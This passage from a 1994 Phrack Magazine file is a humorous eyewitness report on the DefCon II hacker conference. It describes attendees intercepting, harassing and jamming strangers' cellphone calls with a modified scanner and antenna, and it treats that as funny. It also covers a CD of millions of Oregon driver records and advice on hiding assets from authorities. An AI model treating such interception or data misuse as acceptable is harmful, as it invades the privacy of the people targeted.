Phil's own patented grin, preceeded him down the hallway.  

"Here  he is!"  "It's Phil Zimmerman."  Get down and bow.   "Hey, 
Phil the PGP dude is here."

He  was  instantly surrounded by those who recognize him  and  by 
those  who  don't but  want  to  feel like part of the  in-crowd.  
Chat chat, shit-eating grin, good war stories and G-rated  pleas
antries.  Phil was doing what he does best: building up the  folk 
hero image of himself.  His engaging personality (even though  he 
can't  snorkel to save his ass) mesmerized the young-uns  of  the 
group.  "You're Phil?"  

"Yeah."   No  arrogance,  just a warm  country  shit-eating  grin 
that's  not really shit-eating.  Just Phil being Phil.  He  plays 
the part perfectly.

Despite the attention, the fame, the glory (money? nah . . .) the 
notoriety and the displeased eyes of onlooking Computer Cops  who 
really  do  believe he belongs in jail for 4 years,  Phil  had  a 
problem tonight.  A real problem.

"I  don't have a room!" he quietly told Jeff at the desk.   "They 
say  I'm  not registered."  No panic.  Just  a  shit-eating  grin 
that's not a shit-eating grin and hand the  problem  over  to the 
experts:  in  this case Jeff Moss.  Back to his  endearing  fans.  
Phil is so damned kind I actually saw him giving Cryptography 101 
lessons  on  the corner of a T-shirt encrusted table.  "This  is   
plaintext and this is crypto.  A key is like a key to your  hotel 
room . . . "   If only Phil had a hotel room.

Someone  had screwed up. Damn computers.  So the search  was  on.  
What had happened to Phil's room?  Jeff is scrambling and  trying 
to  get the hotel to rectify the situation. Everyone  was  abuzz.  
Phil,  the  crypto-God himself was left out in  the  cold.   What 
would he do?

When  suddenly, out of the din in the halls, we heard  one  voice 
above all the rest:

"Phil can sleep with me!"  

Silence.   Dead stone cold silence.  Haunting silence like  right 
after  an  earthquake and even the grubs and  millipedes  are  so 
shaken they have nothing to say.  Silence. 

The  poor kid who had somehow instructed his brain to  utter  the 
words  and permitted them to rise through his esophagus  and  out 
over  his  lips stood the object of awe, incredulity  and  mental 
question marks.  He must have thought to himself, "what's  every
one  staring  at?  What's going on?  Let me in on it."   For  the 
longest  10 seconds in the history of civilization he  had  abso
lutely no clue that he was the target of attention.  A handful of 
people even took two or three steps back, just in case.  Just  in 
case of what was never openly discussed, but nonetheless, just in 
case.

And  then the brain kicked in and a weak sheepish smile of  guilt 
overcame  this cute acne-free baby-butt smooth-faced  hacker  who 
had  certainly  never had a shave, and was barely old  enough  to 
steer his own pram. 

"Ohhhhhh . . . . noooooo," he said barely louder than a  whisper.  
"That' not what I mean!"

I nearly peed laughing so hard in unison with a score of  hackers 
who agreed that these misspoken words put this guy in the unenvi
able  position  of being the recipient of a  weekend  of  eternal 
politically incorrect ridicule.  

"Yeah, right.  We know what you mean . . "

"No  really . . ." he pleaded as the verbal assaults on  his  al
leged sexual preferences were slung one after the other.  

This  poor kid never read Shakespeare: "He who doth  protest  too 
much . . ."  

If  we  couldn't have a great kickoff speech, or  comedian,  this 
would have to do.  

The majority of the evening was spent making acquaintances:

"Hi, I'm Jim.  Oops, I mean 'Septic Tank," was greeted with  "Oh, 
you're Septic. I'm Sour Milk."  (Vive la difference!) People  who 
know  each  other electronically are as surprised to  meet  their 
counterparts  as are first daters who are in love with the  voice 
at  the other end of the phone.  "Giving good phone" implies  one 
thing while "Having a great keystroke" just might mean another.  

The din of the crowd was generally penetrated by the sounds of  a 
quasi-pornographic  Japanese high tech toon of  questionable  so
cially redeeming value which a majority of the crowd appeared  to 
both  enjoy and understand.  I am guilty of neither by reason  of 
antiquity.

And so it goes.

			* * * * * 

Phil Zimmerman must have gotten a room and some sleep because  at 
10AM  (or closely thereafter) he gave a rousing (some  might  say 
incendiary)  speech  strongly attacking the  government's  nearly 
indefensible position on export control  

I was really impressed.  Knowing Phil for some time, this was the 
first  time I ever heard him speak and he did quite an  admirable 
job.  He ad libs, talks about what he want to talk about and does 
so in a compelling and emotional way. His ass is on the line  and 
he  should be emotional about it.  The audience, indeed  much  of 
counter culture Cyberspace loves Phil and just about anything  he 
has  to  say.  His affable 40-something attorney  from  Colorado, 
Phil  DuBois  was there to both enjoy the  festivities  and,  I'm 
sure,  to keep tabs on Phil's vocalizations.  Phil is almost  too 
honest  and open for his own good.  Rounds and rounds of  sincere 
appreciation.



Hey  kids,  now  it's time for another round  of  Spot  The  Fed.  
Here's  your  chance to win one of these wonderful "I  Spotted  A 
Fed" T-shirts. And all you have to do is ID a fed and it's yours.  
Look  around you?  Is he a Fed?  Is she under cover or under  the 
covers? Heh, heh.  Spot the Fed and win a prize.  This  one-size-
fits-all  XXX Large T-shirt is yours if you Spot the Fed.  I  had 
to  keep silent.  That would have been cheating.  I hang  out  on 
both sides and have a reputation to maintain.

"Hey,  I  see one" screeched a female voice (or  parhaps  it  was 
Phil's  young admirer) from the left side of the 400+ seat  ball
room.   Chaos!  Where? Where?  Where's the fed?  Like  when  Jose 
Consenko  hits  one  towards the center field  fence  and  70,000 
screaming  fans  stand on their seats to get a better view  of  a 
three inch ball 1/4 mile away flying at 150 miles per  hour, this 
crowd stood like  Lemmings  in view of Valhalla the Cliff to espy  
the  Fed.  Where's the Fed?

Jeff jumped off the stage in anxious anticipation that yet anoth
er anti-freedom-repressive law enforcement person had blown   his  
cover.   Where's the Fed?  Jeff is searching for the accuser  and 
the  accused.  Where's the Fed?  Craned necks as far as  the  eye 
can see; no better than rubber neckers on Highway 95 looking  for 
steams of blood and misplaced body parts they half expected a Fed 
to  be  as  distinctly obvious as Quasimoto  skulking  under  the 
Gorgoyled parapits of Notre Dame.  No such luck.  They look  like 
you and me. (Not me.)  Where's the Fed?

He's getting closer, closer to the Fed.  Is it a Fed?  Are you  a 
Fed?  C'mon, fess up.  You're a a fed. Nailed.  Busted.  Psyche!

Here's  your  T-shirt.   More fun than Monty  Hall  bringing  out 
aliens  from behind Door #3 on the X-Files.  Good clean fun.  But 
they didn't get 'em all.  A couple of them were real good.   Must 
have  been  dressed  like an Hawaiian surf bum  or  banshee  from 
Hellfire, Oregon.  Kudos to those Feds I know never got  spotted.  
Next year, guys.  There's always next year.

Phil's notoriety and the presence of the Phoenix, Arizona prosecu
tor   who was largely responsible for the dubiously effective  or 
righteous  Operation  Sun Devil, Gail Thackeray  ("I  change  job 
every 4 years or so - right after an election")  brought out  the 
media.  The LA TV station thought they might have the makings  of 
a story and sent a film crew for the event.  

"They're Feds. The ones with the cameras are Feds.  I know it. Go 
ask 'em."  No need. Not. 

"Put away that camera."  At hacking events it's proper  etiquette 
to ask if people are camera shy before shooting.   The guy that I 
was  sitting next to buried his face in his hands to avoid  being 
captured on video tape. 

"What are you; a Fed or a felon?" I had to ask.

"What's the difference," his said.  "They're the same thing."  So 
which  was it, I wondered.  For the truly paranoid by  the  truly 
paranoid.   

"Get  that  thing outta here," he motioned to the film  crew  who 
willingly  obliged  by turning off the lights.   "They're  really 
Feds,"  he whispered to me loud enough for the row in  front  and 
behind us to hear.  

I moved on.  Can't take chances with personal safety when I  have 
kids to feed.  Fed or felon, he scared me.

Gail Thackeray  was the next act on stage. She was less in agree
ment about Phil Zimmerman than probably anyone (except the  unde
tected Feds) in the audience.  She, as expected, endorsed much of 
the  law  enforcement programs that revolve  around  various  key 
management  (escrow) schemes.  Phil recalls a letter  from  Burma 
that  describe how the freedom fighters use PGP to  defend  them
selves against repression.  He cites the letter from Latvia  that 
says  electronic  freedom as offered by PGP is one of  the  only   
hopes for the future of a free Russia.  Gail empathizes but  sees 
trouble  closer  to home. Terrorism a la World Trade  Center,  or 
rocket launchers at O'Hare Airport, or little girl snuff films in 
Richmond,  Virginia,  or the attempt to poison the  water  supply 
outside of Boston.  These are the real threats to America in  the 
post Cold War era.

"What about our personal privacy!" cries a voice.  "We don't want 
the  government listening in.  It's Big Brother 10  years  behind 
schedule." 

Gail  is amused.  She knew it would be a tough audience  and  has 
been through it before.  She is not shaken in the least.  

"I've read your mail," she responds.  "Its not all that interest
ing."   The audience appreciates a good repartee. "You gotta  pay 
me  to  do this, and frankly most of it is pretty  boring."   She 
successful made her point and kept the audience laughing all  the 
way.

She then proceeded to tell that as she sees it, "The  expectation 
of  privacy isn't real."  I really don't like hearing this for  I 
believe  in the need for an Electronic Bill of Rights.  I  simply 
think she's wrong.  "History is clear," she said  "the ability to 
listen in used to be limited to the very few.  The telegraph  was 
essentially  a  party line and still today in  some  rural  areas 
communications aren't private.  Why should we change  it now?"

"Gail,  you're so full of shit!" A loud voice bellowed from  next 
to me again. Boy can I pick seats. "You know perfectly well  that 
cops  abuse the laws and this will just make their  jobs  easier. 
Once people find a way to escape tyranny you all want to bring it 
right  back again.  This is revolution and you're scared of  los
ing.  This kind of puke scum you're vomiting disgusts me.  I just 
can't  take it any more. " Yeah, right on.   Scattered  applause.  
While  this  'gent' may have stated what was on many  minds,  his 
manner was most unbefitting a conference and indeed, even  DefCon 
II.   This was too rude even for a hacker get-together.  The  man 
with  the  overbearing comments sat down apologizing.  "She  just 
gets  me going, she really does.  Really pisses me off  when  she 
goes on like about how clean the Feds are.  She knows better than 
to run diarrhea of the mouth like that."

"You  know,"  she continued.  "Right across the street is  a  Spy 
Shop.  One of those retail stores where you can buy bugs and taps 
and eavesdropping equipment?"  The audience silently nodded.  "We 
as law enforcement are prohibited by law from shopping there  and 
buying  those same things anyone else can.  We're losing on  that 
front."  Cheers. Screw the Feds.


--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Five, Issue Forty-Six, File 20 of 28

****************************************************************************

                  (Cyber Christ Meets Lady Luck Continued)


I  don't agree with everything that Gail says, but she is a  com
pelling  speaker; she believes in what she says.  But I do  agree 
with  her  on  the difficulty of forensic  evidence  in  computer 
cases.

"I  got  really mad," she said.  "I was reading  a  magazine  and 
there was an ad for United, you know, the employee owned airline.  
And it was a beautiful ad, hundred of employees standing in front 
of  a brand new great big jet. All smiling and happy." Gail  then 
frowned deeply.  "Some stockholder ought to sue them for mislead
ing  advertising."  This was more like it!  Go, Gail! "I  started 
to look at the picture carefully and I noticed this  unmistakably 
fat lady in a pink dress.  And then over a few persons. .  .guess 
what?  The  same fat lady in pink."  Roars of  laughter  and  ap
plause.  

Her point? What seems real may not be real at all, and with a few 
hundred  dollars in software and a little practice,  most  anyone 
can build a false reality digitally.  

Her time was up but the audience wanted more.  She was mobbed for 
eternity by hackers who fight her tooth and nail but respect  her 
comportment  enough to make the disagreements  lively,  partisan, 
entertaining, but with respect.  Respectful hackers.  No  HoHoCon 
orgies; merely verbal barbs with no solution. Everyone knew that, 
but it's the battle that counts.

More  security  conference should be this open, this  honest  and 
informative, with all kinds of people with all kinds of opinions.  
That  is  how we, and I, learn.  Listen and learn.  And  all  for 
$5000 no less, plus a paltry $15 entrance fee.

			* * * * *

The afternoon sessions were filled with a mixture of anti-govern
ment,  pro-privacy  advocacy, virus workshops and  such  by  both 
under  and above ground folks.  Padgett Peterson's  knowledge  of 
viruses  is deep and he spread the same wisdom as his does in  so 
called  legitimate circles.  Knowledge is knowledge,  and  better 
accurate than wrong.

It's  often  surprising  to see how people will  voice  the  same 
opinion  in  varying  degree of intensity  depending  upon  their 
audience.  Mark Aldrich of General Research Corp. in the Washing
ton area made a statement that I doubt I would hear at a  ConCon. 
"Fear  your  government  that fears your crypto.  Use  crypto  as 
a weapon."  Sara Gordon's panel discussion on crypto  and privacy 
and  related topics fueled the audience's general anti-fed  atti
tude.

"I  was bugged by the Feds."  "So was I?"  "What can we do  about 
it."   "Yeah, they listen in on my phones, too.  I can  hear  the 
clicks."  Right.

As  Mark  so succinctly put it, "if the government wants  to  bug 
you, you'll never know.  They're that good.".  That kind of  shut 
up  the dilettante paranoids in the group, albeit  mumbling  that 
they just knew that they were the victim of one of the 900 or  so 
court  approved  wire taps last year.  Right.  I think Gail  was   
right: some of you guys are too boring to be believed.

The  afternoon edition of the Spot A Fed contest took us  on  the 
run. I  actually succombed to their enthusiasm and a general lack  
of better judgement and followed a group of 8 or 10 to unmask  an 
unmarked white van in the parking lot. 

"It's the Feds." "How do you know?"  "Oh, it's the Feds alright."  
"How do you know."  "It's a white van and the intelligence  serv
ices  use white vans."  "What are you going to do?"  "Bust  'em."  
"Bust 'em for what?"  "For being Feds."  

This motley crew traipsed through the mile long casino,  trodding 
upon the ugly tartan/paisley carpets so obnoxiously loud a  blind 
man  could  cry "Uncle!", into the Hall  of   Overpriced  Shoppes 
through the lobby and over to the parking garage.  We had to have 
$100,000 of surveillance gear in tow:(enough to detect the planet 
Pluto fart in b-flat).  Radio receivers and eavesdropping  equip
ment  were courtesy of my pal Mike Peros. The goal was,  if  this 
was a Fed van, we could hear it.  I don't think so, but I go  for 
the  ride and a few minutes of reprieve away from the  conference 
hall. 

As we near, the excitement grows among the more paranoid who  are 
trying to instill their own mental foibles into their  companions 
and  sheer terror in normal old Vegas visitors who have  no  idea 
what they've walked into.

Feds? Not. Surrepticious radio transmissions?  Just hotel securi
ty  tracking the movements of 8 or 10 paranoids (and  one  writer 
with  nothing else to do for a half hour) into a  parking  garage 
which has more cameras than NBC.  Feds?  Of course not.  Don't be 
ridiculous. 

			* * * * * 

To say nothing worthwhile occurred until 11PM that evening  would 
be lying, but this thing, this DefCon II thing, was turning  into 
what  I would have called 25 years ago, a Love-In.  The  partici
pants were giddy from the event, the camaraderie, the $1  Heinek
ens and the hacking.  The Sahara  was actually pretty good  about 
it. Jeff got the conference space for free because he  guaranteed 
that  at least 100 hotel rooms would be booked by  "computer  en
thusiasts coming to a small computer conference."  Little did the 
hotel  know that half the crowd was too young to drink, too broke 
to gamble, and conspicuous enough to ward off legitimate clients.  
But a deal's a deal.

The hotel operators went out of their way and allegedly gave  the 
hackers permission to hack through the PBX in order to provide  a 
SLPP connection.  

"Just put it back the way you found it when you're done," was the 
hotel's only and quite reasonable request.

In my day an equivalent event producing an equivalent social non-
drug  induced high would have been achieved by tossing a  Frisbee 
to  Grace  Slick (Lead singer Jefferson Airplane)  and  have  her 
throw it back. We didn't have the kind of technology that today's 
rebellious  age has.  We had the Beatles and Jimi  Hendrix,  safe 
sex (kinda), safe drugs (well, maybe a little safer) and a cause.  
But no technology to speak of.

When  I  was on the publishing staff of the New  York  City  Free 
Press  in  1968/9 we wrote our  anti-establishment  diatribes  by 
hand.   By hand! And then we went down to a dark office  late  at 
night to use their typesetting gear when it was idle.  It took no 
more  than a blushing glance around the room to realize  that  we 
impressionable teens were publishing our political extremisms  on 
equipment courtesy of Al Goldstein and Screw magazine.  Now  that 
was an education.  

DefCon II was a Love-In, technology and all.  

Come  11PM yet another speaker canceled so  I offered to chat  to 
the  crowd for a half hour or so on Van Eck radiation; the  emis
sions  from  CRT's that make video screens readable from  a  dis
tance.   Now this wasn't a fill in at 2PM or anything.   Sessions 
reconvened at 11PM and I spoke to a full audience who were  there 
to get a midnight lesson in cellular hacking.

Most  above ground types still believe that hacking is  an  acne-
faced  teenager,  chigging  Jolt Cola,  wolfing  down  pepperoni 
pizza  and causing Corporate America no end of grief.  To a  cer
tain extent some of this is true.  But hacking is so much more.

As  Rop  Gongrijjp, editor of Hacktic once told me,  "hacking  is 
disrespect of technology."  It's going the extra mile to find out 
how things work.  Many of the older hackers, those in their early 
20's  and older, are migrating from the  conventional  dial-em-up 
and  break-in hacking image to the fine art of cellular  hacking. 
How  do these things work?  What are the frequencies? How  can  I 
customize my phone?  How many channels can I scan?  The possibil
ities are endless as I soon learned.

Jim and Bill (fake names) asked if I wanted to see a great  demo. 
Sure!   No  names, they said.  OK.  No problem.  In  one  of  the 
several  thousand hotel rooms at the Sahara was a pile of  equip
ment  to make an under budgeted  FBI surveillance  team  insanely 
jealous. There in the middle of the ridiculously filthy room that 
no  doubt caused the maid to shudder, sat a log periodic  antenna 
poised  atop  a strong and highly  adjustable  photographic-style 
tripod.   Feeding  the antenna was a hunk of coax attached  to  a 
cell phone's antenna jack.

OK, so what's that?  Free cell calls?  No, much more.

A second cell phone/scanner, an Oki 900 was modified and connect
ed to a laptop computer.  (This was the exact modification  being 
discussed downstairs)  Custom software that was freely   distrib
uted  around DefCon scanned the data from the Oki  and  displayed 
the scanning activity. A pair of speakers then audibly  broadcast 
the  specific conversation.  And in Vegas, you can  imagine  what 
was going over the open airwaves!

A  half dozen 'kids' sat around enthralled, each begging for  his 
turn to, as Jim put it, "harass cellular users.  Pure and simple. 
Harassment. Stomp on the son of a bitch,"  he laughed, joined  in 
by the others. 

When a 'good' conversation was detected, they entered the channel 
into  the broadcasting cell phone and spoke.  And talk they  did. 
Essentially  they turned 'private' conversations  into  wide-band 
free-for-alls.  If they spoke for only a few seconds one or  both 
of  the parties could hear what was being said.  If  they  talked 
for  too  long, the overpowering signal from  the  antenna  would 
literally  wipe  out the chat: the cell switch  reacted  with  an 
internal belch and shut down. Stomping, they called it.  

For  those on the receiving end of the harassment, it  must  have 
sounded  like  the overbearing voice of God telling Noah  how  to 
build the Ark.

"Noah?"

"Who dat?

"Noah?"

"Who is that?"

What terror lurks in the minds of boys . . .

For  those  old enough to remember, stomping is no more  a  stunt 
than putting a 500 watt linear power amplifier on a CB radio  and 
blasting nearby CB's to kingdom come.  The truckers used to do it 
to  4-wheelers. When the police began monitoring CB channels  "to 
protect  and  serve" they became the target of CB  stomping.   So 
what else is new?  

I gotta give it to them: these characters designed and built  the 
software,  modified  the phones and put it all  together  and  it 
works!   Not  bad on a $3 allowance and a 10th  grade  education.  
Now,  I guess what they did may have been sort of illegal, or  at 
least  highly unethical and definitely  not nice. But I  have  to 
admit,  some of what I witnessed was very, very, funny.  I'm  not 
advocating  this  kind of activity, but much like  Candid  Camera 
broke  into  people's lives to capture their reactions,  cellular 
hacking  is similarly amusing.   The hacker/phreaks  particularly 
enjoyed breaking in on fighting couples.  (I counted six  impend
ing divorces.) Almost without exception the man was in a car  and 
the lady was at a fixed location; presumably, home. 

Him: "Where the hell have you been."
Her:  "Nowhere."
Him: "Bullshit.
Her: "Really honey . . ."  Defensively.
Him: "Who's with you?"  Intense anger.
Hacker: "Don't believe her.  She's a whore."
Him: "What was that?"
Her: "What?"
"That voice."
"What voice?"
Hacker:  "Me you asshole. Can't you see she's playing you  for  a 
fool."
"I know she is."  He agrees.
"What's that honey?"  
"I know he's there with you."
"Who?" Incredulous.
"Him . . . whoever you're fucking when I'm at work." 
Hacker: "Yeah, it's me."
"Shit! Who the fuck is there?"
"No one!"
"I can hear him, he's there.  You're both making fun of me . . ."
Hacker: "She's laughing at you, man."
"No shit.  Who the fuck are you?"
Hacker: "The guy who takes care of her when you can't, asshole."
"That's it."  Click.

Drug dealers aren't immune to these antics.

"Where's the meet?"
"By the 7/11 on Tropicana."
"You got it?"
"You got the cash?"
"Yeah, dude."
"Be sure you do."
Hacker:  "He  doesn't have the cash my man.  He's gonna  rip  you 
off."
"What?"  "What?"  Both sides heard the intruder's voice.  "Who is 
that?"
"What's that about a rip-off?"
"This ain't no rip-off man."
Hacker: "Yes it is. Tell 'em the truth. You gonna take his  drugs 
and shoot his ass. Right?  Tell 'em."
"You gonna rip me off?"
"No, man!"
"Your homeboy says you gonna try and rip me off?"
"What home boy?"
Hacker:  "Me, you bozo drug freak. Don't you know that  shit  can 
kill you?"
Click.

Good samaritanism pays off upon occasion.

"Honey, hurry up."
"I'm on the freeway.  I'm coming."
Hacker: "He's late.  Let's save her ass."
"What was that?"  "What did you say honey?"
"He said he was going to save your ass."
"Who did?"
"The guy on the radio."  (Technical ignorance abounds.)
Hacker:  "Me.  You're late and she's scared so we're  gonna  beat 
you there and make her safe."
"Who the hell is that?"  "Who?" "The guy with you?"  "There's  no 
one here." "He says he's gonna beat me there and pick you up."
Hacker: "Damn right we are."
"Hey, this is cool.  Who's there?"
Hacker: "Cyber Christ talking to you from Silicon Heaven."
"No shit.  Really?"
Hacker: "Yeah, (choke, choke,) really."
"What's happening, honey."
"I don't know, for sure.  He says it's God."
"God!?!?"
Hacker:  "Close enough.  Listen, you sound alright.  Go get  your 
woman, man  Keep her safe."
"No problem.  Uh, thanks."
Click.

Around 4AM, I guess it was, the hacker/phreaks definitely  helped 
out law enforcement.  One end of the conversation was coming from 
inside  a  hotel, maybe even the Sahara. The other  from  another 
cell phone, most likely in the lobby. 

"What do you look like?"
"I'm  five foot nine, thinning brown hair and 180 pounds  I  wear 
round glasses and  . ."
"I get the idea. Where are you now?"
"I'm coming down the elevator now.  What do you look like?"  
"I'm  six foot one in my heels, have long blond spiked  hair  and 
black fishnet stockings."
Hacker: "Don't go man.  It's a bust."
"What?" he said.
Hacker:  "Don't go, it's a bust. You don't want your name in  the 
papers, do ya?"
"What the fuck?" she yelled.
"There's a guy who says this is a bust?"
"Bust? What bust?"
Hacker: "That's the clue, man.  She's denying it.  Of course it's 
a bust.  Is it worth a night in jail to not get laid?"
"Shit."  He whispers not too quietly to another  male  companion.  
"There's some guy on the phone who says it's bust. What should we 
do."
Hacker: "I'm telling you man, don't go,"
"This ain't worth it. I'm going back upstairs."
Click.

A couple of hours later the same hooker was overheard talking  to 
one of her work mates.

"Then this asshole says it's a bust.  Cost me $300 in lost  busi
ness, shit."
"You,  too?   Same shit been going on all night  long.  What  the 
fuck?"

Wow.  And it seems like only this morning that my toilet  explod
ed. 

			* * * * *

So  what's a perfectly groomed and slightly  rotund  50-something 
convicted methamphetamine dealer doing at DefCon II with hundreds 
of impressionable teenagers?  You might well ask. 

So I'll tell you.

Sitting in yet another Saharan hell-hole of a room they  unabash
edly market for $55 per night I encountered hackers #1 through #4 
and  this  . . . I immediately thought, elderly  gent.   He  said 
nothing  and neither did I, thinking that he might have  been  an 
over  aged  chaperone  for delinquent teens or  perhaps  even  an 
understanding Fed.   But the gallon jugs of whiskey was depleting 
itself right before my eyes, as if a straw from Heaven sucked the 
manna from its innards.  Actually, it was Bootleg.

Not bootleg liquor, mind you, but Bootleg the felonious con  from 
Oregon.  Apparently he got busted 'cause speed is and was against 
the law, and crank is not exactly the drug choice of maiden aunts 
nor school marms.  "I've been a hacker longer than some of  these 
kids  have been alive. It all started back in . . ."   and   Mike 
"Bootleg" Beketic commenced on the first of hundreds of war-story 
jail  house tales to entertain him and us.  Bootleg loves a  good 
story.

"Jail ain't so bad," he  bragged with a huge whiskey smile.   "No 
one fucked with me.  You gotta make friends early on.  Then  it's 
OK."  Good advice, I guess.  "On parole I got slammed with a year 
for  piss that didn't pass."  Gotta be clean, my man.  Stay  away 
from that shit.  It'll kill you and your teeth will rot. 

Bootleg  handed  me  form PROB-37, (Rev. 1/94)  from  the  United 
States District Court, Federal Probation System.  Grins from  ear 
to ear.  A badge of honor for villains, thieves, and  scoundrels. 
Sounds like they need their own union.

This was the official "Permission To Travel" form dated June  16, 
1994 which gave Bootleg the legal right to travel from Oregon  to 
Las Vegas in the dead of the summer to attend a "computer conven
tion."   The flight times were specific as were the conditions of 
his  freedom.   He had to inform the local cops that  he  was  in 
town.   In  case any crimes occurred throughout the city  of  Las 
Vegas during his sojourn, he was an easily identifiable suspect.  

While  he downed another Jack and coke I found out  what  Bootleg 
was really doing.  Despite the fact that the "Federal Keep  Track 
of a Crook Travel Form" said, "you are prohibited from  advertis
ing  or  selling  your DMV  CD,"  the  paranoia that runs rampant  
through the minds of prison bureaucracy was actually in this case  
quite correctly concerned. 

"What's a DMV CD?"

"I'm glad you asked."  I was set up.  The edict said he  couldn't 
sell  or  advertise, but there was no provision stating  that  he 
couldn't answer questions from an inquiring mind.

Bootleg handed me a CD ROM:

			Bootleg Presents:
			     DMV

		- Over 2 Million Oregon Drivers License Records
		- Over 3 Million Oregon License Plate Records

The inside jacket clearly stated that this information was not to 
be used by any creatively nefarious types for any sort of person
al Information Warfare tactics.  It warns,

Do not use this CD to:

	- Make phony Licenses
	- Make phony Titles
	- Obtain phony I.D.
	- Harass Politicians, Cops or Journalists
	- Stalk Celebrities
	- Get ME in trouble <G>

I  can come up with at least 1001 other uses for this  collection 
of  information  that the Oregon authorities are none  too  happy 
about.   The  ones  Bootleg outlined never  came  into  my  mind.  
(Heh!) Bootleg acquired the information legally.  State officials 
were kind enough to violate the electronic souls of its  citizens 
by sending Bootleg their driver's information magnetically embla
zoned  on  a 3600 foot long piece of 9 track acetate.   Now  they 
want  to  change the law to reflect "heart felt concern  for  the 
privacy of their citizens."  Get a clue, or if none's  available, 
buy one from Vanna.  

Bootleg  is  moving onto the next 47 states (California  and  New 
York don't permit this kind of shenanigans) shortly to make  sure 
that  everyone  has equal access.  Hacking? Of  course.   Bootleg 
effectively  hacked  the Oregon DMV with their blessing  and  tax 
payer paid-for assistance. 

Time  to  go back to my room while Bootleg and friends  spent  an 
evening  of apparently unsuccessful whoring around the Strip  and 
Glitter Gulch.

A good time was had by all.

			* * * * *

Jeff  Moss  opened  the Sunday morning session  with  an  ominous 
sermon.

"You'll  notice that the wet bar is missing from the  rear?"   It 
had  been  there yesterday.  Everyone turns around to  look.   "I 
gotta  pay for the damage . . . "  Jeff was not a  happy  camper.  
"They  have my credit card number and it's almost full.  So  cool 
it!" But the show must go on and we had more to learn.

Next.   Anonymous mailers on the net?  Forget about it.  No  such 
thing. Anonymous remailers, even if they are in Norway or Finland 
or some such other country where American information  contraband 
such  as child pornography is legal, are only as safe and  secure 
as the people who run it

"The  FBI can go over any time they want and look up who you  are 
and  what kinds of stuff you swallow down your  digital  throat," 
one  speaker  announced.  Of course that's ridiculous.   The  FBI 
would  have to call in the Boy Scouts or Russian Mafia  for  that 
kind of operation, but we all knew that anyway.  A slight slip of 
the ad lib tongue.  No harm done.  

I  didn't know, until this Sunday, that there were actually  real 
live versions of "Pump Up The Volume" running rampant across  the 
country,  impinging their commercial-free low power radio  broad
casts into an electromagnetic spectrum owned and operated by  the 
Federal  Communications Commission.  And, as to be expected,  the 
FCC  is trying to put these relatively harmless stations  out  of 
business  along with Howard Stern and Don Imus.  One would  think 
that WABC or KLAC or any other major market stations would little 
care  if a podunk 20 watt radio station was squeezing in  between 
assigned  frequencies.  And they probably shouldn't.  But, as  we 
learned, the Military lent an innocent hand.  

In  support of the hobbies of servicemen, a local  San  Francisco 
base commander gave approval for a group of soldiers to establish 
a small, low power radio station for the base.  Good for  morale, 
keep the men out of the bars: you know the bit.

But  the  ballistic missiles went off when the  nation's  premier 
rating service, Arbitron, listed KFREE as a top local station  in 
the San Francisco market.

"What station KFREE?"  "Who the hell are they?"  "What the fuck?"

Needless to say, KFREE was costing the legitimate radio  stations 
money  because  advertising rates are based upon  the  number  of 
listeners not up and peeing during commercials.  Since KFREE  was 
ad-free,  no contest.  Arbitron assumes the rating to relect  the 
existence  of  a real station - the numbers are there -  and  the 
local  stations  call the FCC and the FCC calls the base  and  as 
quick as you can scream, "Feds suck!" KFREE is off the air.  

Stomp.

I  was scheduled to speak today, but with the schedule  seemingly 
slipping  forward  and backward at  random  haphazard  intervals, 
there  was  no telling when what would occur.  Mark  Ludwig,  of   
Virus Writing Contest fame and author of the much touted  "Little 
Black  Book  of Computer Viruses" Virus gave a less  then  impas
sioned speech about the evils of government.

"I know most of you don't have any assets other than your comput
er,"  Ludwig  said to the poverty stricken masses of  DefCon  II.  
"But  you will, and you want to make sure the government  doesn't 
come  crashing down around you whenever they want.  They can  and 
will  take your life away if it suits them.  There is  no  fourth 
amendment.   Most  search and seizures are illegal."  And  so  it 
went. 

"Put your money off shore, kids," said Dr. Ludwig the theoretical 
physicist.   "Find a good friendly country with flexible  banking 
laws and the Feds can't get you."

"And  when the Feds do come for you, make sure that  your  entire 
life is on your computer.  Rip up the papers after you scan  them 
in.   Your all-electronic life cannot be penetrated -  especially 
if  you get a case of the forgets.  'Oops, I forgot my  password. 
Oops! I forgot my encryption key.  Oops! I forgot my name.'"

"Even your VISA and Mastercard accounts should be from  overseas.  
Keep it out of the US and you'll be all the better for it."   For 
those interested in such alternative, Ludwig recommends that  you 
call  Mark Nestman: of LPP Ltd. at 800-528-0559 or  702-885-2509.  
Tell  him you want to move your millions of rubbles  and  dollars 
and Cyber-credits overseas for safe keeping because the Byzantine 
Police are at the front door as you speak.  Order pamphlet 103.
 
These  are the defensive measures we can take  protect  ourselves 
against the emerging Police State.  But offensive action is  also 
called  for, he says.  "Help Phil Zimmerman.  Send him money  for 
his  defense.   Then, laugh at the Feds!"  Haha, haha.   Haha.  
Hahahahahaha.  Ha!

."When they come to the door, just laugh at them."  Haha.   Haha
ha.  Haha.  "No matter what they do, laugh at them."  Hahahahaha.   
Enough  of  that,  please.  If I laugh at  6  husky  beer-bellied 
Cyber-cops  who have an arsenal of  handguns pointed at my  head, 
they  might as well send me to the Group W bench  to  commiserate 
with  Arlo Guthrie.  Peeing would come before laughing. But  then 
again,  I'm no longer a grunged out 20 year old who can laugh  in 
the face of  the Grim Reaper.  "Yes, ossifer, sir.  I'm a  cyber-
crook.  I ain't laughing at you in your face, ossifer, sir . . ."  
I panic easily.  Kissing ass well comes from a life long  success 
of quid pro quo'ing my way from situation to situation. 

"And, now," Master Mark announced, "on to the results and  awards 
for  the Annual Virus Writing contest."  Ludwig  seemed  suddenly 
depressed.   "Unfortunately, we only got one  legitimate  entry."  
One  entry?   The media plastered his contest across  the  media-
waves and the National Computer Security Association was planning 
a  tactical nuclear response.  One entry?  What kind  of  subver
sives have 20 year olds turned into anyway?  In my day (Yeah, I'm 
old  enough  to use that phrase) if we called for  a    political  
demonstration thousands would pile through the subway  turnstiles 
to  meet a phalanx of well armed police appropriately attired  in 
riot  gear.  One entry?  Come on X-Generation, you can do  better 
than  that?   No wonder the world's going to  shit.   Don't  have 
enough trouble from the young-uns.   Sheeeeeeesssh!

Mark  Ludwig's  politically incorrect virus writing  contest  may 
have  been  a  PR success but it was a  business  abortion.   One 
entry.  Shit.  At the NCSA meeting in Washington,  rivaling  fac
tions battled over how we as an association should respond.  

"Hang the bastard."  "He's what's wrong with world."  "Put him in 
a county jail with Billy-Bob, Jimmy-Ray and Bubba for a week  and 
they'll be able to squeeze him out between the bars."

C'mon  you fools! Ignore him! Ignore him! If you don't like  what 
